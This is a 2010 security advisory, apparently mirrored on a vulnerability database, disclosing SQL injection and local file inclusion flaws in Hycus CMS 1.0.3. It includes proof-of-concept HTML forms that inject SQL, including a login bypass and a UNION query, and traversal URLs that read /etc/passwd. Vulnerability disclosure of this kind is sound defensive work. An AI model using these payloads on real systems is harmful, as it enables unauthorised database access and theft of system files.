Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
htbridgeHigh-Tech BridgeHTB22737
HistoryDec 07, 2010 - 12:00 a.m.

Multiple Vulnerabilities in Hycus CMS

2010-12-0700:00:00
High-Tech Bridge
www.htbridge.com
19

0.007 Low

EPSS

Percentile

80.9%

JSON

High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in Hycus CMS which could be exploited to perform SQL injection attacks, gain access to sensitive information and compromise vulnerable system.

  1. SQL injection vulnerabilities in Hycus CMS: CVE-2010-4612
    The vulnerability exists due to input sanitation errors in the “user_name”, “usr_email”, “q” and “useremail” parameters in index.php. A remote attacker can send a specially crafted HTTP POST request to the vulnerable script and execute arbitrary SQL commands in application`s database. Successful exploitation may allow an attacker to read, modify, add or delete arbitrary data in the database.
    Exploitation examples:
    1.1
    <form action=“http://[host]/?user/1/hregister.html” method=“post” name=“main” >
    <input type=“hidden” name=“full_name” value=“username”/>
    <input type=“hidden” name=“user_name” value=“1’SQL_CODE”/>
    <input type=“hidden” name=“usr_email” value="[email protected]’SQL_CODE"/>
    <input type=“hidden” name=“pwd” value=“123456”/>
    <input type=“hidden” name=“pwd2” value=“123456”/>
    <input type=“submit” value=“submit” name=“submit” />
    </form>
    1.2
    <form action=“http://[host]/?user/1/hlogin.html” method=“post” name=“main” >
    <input type=“hidden” name=“usr_email” value=“1’ OR 1=1 – 1”/>
    <input type=“hidden” name=“pwd” value=“any”/>
    <input type=“submit” value=“submit” name=“submit” />
    </form>
    1.3
    <form action=“http://[host]/?search/1.html” method=“post” name=“main” >
    <input type=“hidden” name=“q” value=“search’ union select 1,2,@@version – 3”/>
    <input type=“submit” value=“submit” name=“submit” />
    </form>
    1.4
    <form action=“http://[host]/?user/1/forgotpass.html” method=“post” name=“main” >
    <input type=“hidden” name=“useremail” value=“1’SQL_CODE”/>
    <input type=“submit” value=“submit” name=“submit” />
    </form>

  2. Local file inclusion in Hycus CMS: CVE-2010-4613
    Input passed to the “site” parameter via index.php and admin.php is not properly sanitized before being used to include local files. A remote attacker can include arbitrary files on the target system using directory traversal sequences with NULL byte.
    Exploitation examples:
    http://[host]/index.php?site=…/…/…/…/…/…/…/etc/passwd%00
    http://[hos t]/admin.php?site=…/…/ …/…/…/…/…/etc/passwd%00

CPENameOperatorVersion
hycus cmsle1.0.3

Related

cve 2
prion 2
cvelist 2
dsquare 1
nvd 2
cve
cve
CVE-2010-4613
2022-10-03 16:21:04
CVE-2010-4612
2010-12-29 22:33:32
prion
prion
Directory traversal
2010-12-29 22:33:00
Sql injection
2010-12-29 22:33:00
cvelist
cvelist
CVE-2010-4612
2010-12-29 19:00:00
CVE-2010-4613
2022-10-03 16:21:04
dsquare
dsquare
Hycus CMS 1.0.3 LFI
2012-04-27 00:00:00
nvd
nvd
CVE-2010-4612
2010-12-29 22:33:32
CVE-2010-4613
2010-12-29 22:33:32

0.007 Low

EPSS

Percentile

80.9%

JSON
Related for HTB22737
cve2prion2cvelist2dsquare1nvd2